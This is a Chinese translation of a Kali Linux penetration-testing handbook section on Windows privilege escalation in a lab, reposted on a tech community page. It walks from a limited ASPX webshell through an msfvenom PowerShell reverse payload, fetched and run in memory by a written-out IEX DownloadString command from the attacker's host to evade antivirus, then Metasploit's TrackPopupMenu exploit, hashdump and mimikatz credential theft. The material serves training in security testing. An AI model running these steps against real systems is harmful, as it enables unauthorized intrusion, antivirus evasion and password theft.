专栏首页玄魂工作室Kali Linux Web渗透测试手册(第二版) - 7.5 - Windows提权

Kali Linux Web渗透测试手册(第二版) - 7.5 - Windows提权

翻译来自掣雷小组

成员信息:

thr0cyte,Gr33k,花花,MrTools,R1ght0us,7089bAt

标记红色的部分为今日更新内容。

7.0、介绍

7.1、使用Exploit-DB利用Heartbleed漏洞

7.2、通过利用Shellshock执行命令

7.3、利用metasploit创建并反弹shell

7.4、Linux上的权限提升

7.5、Windows提权

7.6、使用Tomcat管理界面执行代码

7.7、通过John the Ripper使用字典来破解密码哈希值

7.8、使用Hashcat暴力破解密码哈希


7.5、Windows提权

根据我以往的渗透测试经验来看,有60%以上的服务器都是搭建在windows服务器之上的,并且使用SQL Server作为数据库,所以,作为渗透测试者的我们,更应该掌握Windows服务器的相关知识,而提权,就是其中之一。

在本章节,我们将从Windows服务器上的一个有限的WebShell作为切入点,利用公开漏洞来获得system级别的访问权限,当然,system是windows系统的最高级别权限,在该权限下你可以运行所有的可执行命令。

环境准备

在这个章节中,我们假设获得了运行在windows 2008R2服务器上的网站的WebShell(https://github.com/tennc/webshell/blob/master/fuzzdb-webshell/asp/cmd.aspx),当然这个WebShell是被限制了执行权限的。

Windows 2008R2可以在(https://www.microsoft.com/en-us/download/details.aspx?id=2227)这里下载到。你需要自己添加Web服务器管理员角色并将它配置为支持ASP.NET,管理员角色添加好了,在命令框中执行:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_regiis –I 命令。

实战演练

首先我们需要自己手动上传webshell到自己得服务器上,本例是在:192.168.56.14/cmd.aspx.上传成功后我们第一步要做的就是查看当前用户的级别:

1.打开浏览器访问WebShell,并执行whoami命令,如下图:

如上图,我们的当前用户是defaultapppool,它是iis apppool组的成员。并且这个成员的执行权限是很小的。

2.使msfvenom创建一个反向连接,我们将通过powerShell在目标的内存中运行一些指令,这样是为了防止触发目标服务器上的杀毒软件(只有接触到硬盘操作的时候才会被杀软所重视),所以我们的脚本类型一定要是Powershell支持的脚本类型,参数是-f psh,并且要将该payload保存在下来,使用 -o /var/www/html/cutedolphin.ps1,如下图:

3.创建完payload后,打开Kali服务器,使用命令service apache2 start

4.还需要创建一个handler来监听会话的连接,首先在命令行中执行msfconsole打开metasploit,然后再执行下列命令:

5.Handler的配置如下图所示,仔细检查每一项,确认无误后使用run命令运行:

6.Handler运行后就会处于监听状态,等待目标的链接,所以此时我们需要在目标上执行payload来接入handler,如下图,将Program设置为powershell.exe,Arguments设置为-noexit -ciex((New-ObjetNet.WebClient).DownloadString(‘http://192.168.56.10/cutedolphin.ps1’))然后点击Run运行它:

7.如果payload正确地执行了,那么handler就会接入一个连接,如下图:

8.当meterpreter连接上目标主机时,我们可以尝试使用getsystem命令来提权,如果可以的话便会直接获取到system权限,如果失败的话,正如下图所示,我们使用getsystem并没有成功,还使用了hashdump依然失败了,所以我们只能使用sysinfo命令获取系统相关信息,另辟蹊径。

9.使用background命令将当前会话挂起到后台运行;

10.使用searchsploit命令查找可用于2008R2的模块,其中有一个是用来进行本地权限提升的,但是我们使用它后发现并不起作用,这是因为服务器已经打了补丁的缘故:

11.但是我们知道在Exploit-DB数据库中可用于2008R2的模块绝不仅仅是上图的那6个,我们使用grep命令,查找更多的有关模块,如下图,我们找到了更多:

12.现在我们可以根据自己服务器的配置选择一个可利用的模块,乍一看是有点让人头大,在这里我们可以使用head命令来查看每个候选程序的第一行,比如,如下图,我们可以查看编号为40410的漏洞的前20行信息,可以发现它利用了一个名为Zortam Mp3 Media Studio的软件,但是我们很熟悉我们的服务器中并没有安装该软件,所以我们将它排除,看看别的:

13.我们继续寻找着,知道我们发现了编号为35101的模块,它利用windows的内部组件来进行提权,它属于metasploit的模块之一,所以我们可以将它应用在我们刚才挂起的会话中,模块关键信息如下:

14.打开msfconsole并且使用search命令查找TrackPopupMenu,它是模块的名字,这一点你可以在上图红色横线的地方看到,我们要找的是2014年的,如下图:

15.模块的配置信息如下:

配置完成后应该是这样的:

16.运行漏洞就会发现它会在我们挂起的session 1中生效:

17.在新生成的会话中,我们可以使用getuid命令来查看当前用户信息,也可以使用hashdump命令列出用户的hash密码,还可以加载metasploit模块如mimikatz,并进一步执行kerberos,wdigest,tspkg命令来破解登录用户的密码。

原理剖析

我们在获取到主机的webshell后继续上传更高级的webshell来尝试提权。

首先我们使用msfvenom精心构造了一个powershell类型的payload反向连接,并使用handler来监听它,windows服务器上的powershell会调用WebClient对象和DownloadString函数来下载并执行payload,由于远程文件直接通过IEX在内存中执行了,并没有存储到硬盘中,可以躲过大多数杀软。

获取到目标主机的shell后我们尝试使用命令getsystem命令快速提权,然而并没有起作用,所以我们只好在Exploit-DB数据库中查找其他的可用的模块,该模块可直接用于metasploit中,只需要加载它并未它设置反向连接的IP和端口即可,它便会利用我们已经获得到的session会话尝试执行提权操作,一旦成功,就会返回新的shell。

拓展训练

Pentestmonkey含有一个有趣的程序,它可以评估出当前windows中可能存在的被提权的漏洞,这个程序叫做windows-privesc-check.exe(https://github.com/pentestmonkey/windows-privesc-check/),如下图所示,是它的一些基本用法的展示:

它可以把结果以不同的格式保存下来,如HTML、XML和.txt格式,HTML格式的结果信息如下:

另一个非常有趣的程序是Empire(https://github.com/EmpireProject/Empire),Empire包含多个操作系统的模块,可用于持久化访问,提权,侦察,横向渗透,数据过滤甚至是恶意攻击等目的,但是它并不包在Kali中,你可以在上述地址上下载使用它,下图是它的界面示例:

本文分享自微信公众号 - 玄魂工作室(xuanhun521)

原文出处及转载信息见文内详细说明,如有侵权,请联系 yunjia_community@tencent.com 删除。

原始发表时间:2019-02-28

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

我来说两句

0 条评论
登录 后参与评论

相关文章

  • CTF实战20 渗透测试-后渗透攻击

    一般情况下Linux的本地提权要用nc反弹出来,因为Linux下提升权限后得到的是交互式shell,需反弹才能进行下一步命令的执行

    用户1631416
  • 怎样学Python 第二十一课 模块简介

    欢迎大家回来!我们已经拖延有一段时间了,不是吗? 今天,我们将通过引入模块来启动Python培训系列的第二部分。 我们将首先解释一个模块是什么,我们将举一个例子...

    用户1631416
  • Python爬虫之urllib模块1

    Python爬虫之urllib模块1 本文来自网友投稿。作者PG,一个待毕业待就业二流大学生。玄魂工作室未对该文章内容做任何改变。 因为本人一直对推理悬疑比较感...

    用户1631416
  • 「css基础」Transforms 属性在实际项目中如何应用?

    关于Transform变形属性大家都不陌生吧,可以通过此属性实现元素的位移translate(x,y),缩放scale(x,y),2d旋转rotate(angl...

    前端达人
  • 高防服务器究竟能防御哪些攻击?

    基于DDoS比较广泛,很多机房都会针对DDoS攻击进行,因此,很多企业会选择高防服务器来进行抵御恶意攻击。

    尊托云数
  • 【征信】美国P2P平台upstart不用FICO评分是怎么运作的?

    国际范围来看,年轻的消费者都是信贷需求比较强烈的人群,但是因为传统银行要求借款者数年的信用和从业记录,这一群体的信贷服务并不是很通畅。如果一个人很年轻并且没有很...

    小莹莹
  • [深度学习概念]·深度学习进行语音识别-简单语音处理

    吴恩达教授曾经预言过,当语音识别的准确度从95%提升到99%的时候,它将成为与电脑交互的首要方式。

    小宋是呢
  • cssjshtml vue.js vue生命周期

    葫芦
  • 骗局翻新, 暗网活跃度倍增, 2018加密货币犯罪报告敢看吗?

    近日,据数字货币研究机构 Chainalysis 发布的一份名为《Crypto Crime Report》的报告显示,加密犯罪仍是加密货币生态系统中仍需解决的重...

    区块链大本营
  • 数据库复制(一)--复制介绍

    介绍: 在运行着的数据库驱动的应用程序中,SQL复制能解决许多问题。由于发送/订阅的模式不是十分容易理解,复杂的脚本语言和监视复制系统也是需要一定的思想在里面。...

    用户1217611

扫码关注云+社区

领取腾讯云代金券